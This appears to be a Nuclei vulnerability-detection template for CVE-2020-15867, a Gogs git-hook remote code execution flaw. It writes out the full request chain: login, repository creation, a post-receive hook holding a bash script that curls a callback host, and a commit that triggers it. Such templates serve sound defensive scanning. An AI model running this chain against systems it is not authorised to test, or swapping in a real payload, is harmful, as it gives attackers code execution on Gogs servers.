id: CVE-2020-15867 info: name: Gogs Git Hooks - Remote Code Execution author: theamanrawat severity: high description: | The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. There can be a privilege escalation if access to this hook feature is granted to a user who does not have administrative privileges. reference: - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-15867 - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 metadata: verified: "true" tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm requests: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body_1 words: - 'content="Gogs' extractors: - type: regex name: csrf group: 1 regex: - 'name="_csrf" value="(.*)"' internal: true - type: regex name: auth_csrf group: 1 regex: - 'name="_csrf" content="(.*)"' internal: true - type: regex name: last_commit group: 1 regex: - 'name="last_commit" value="(.*)"' internal: true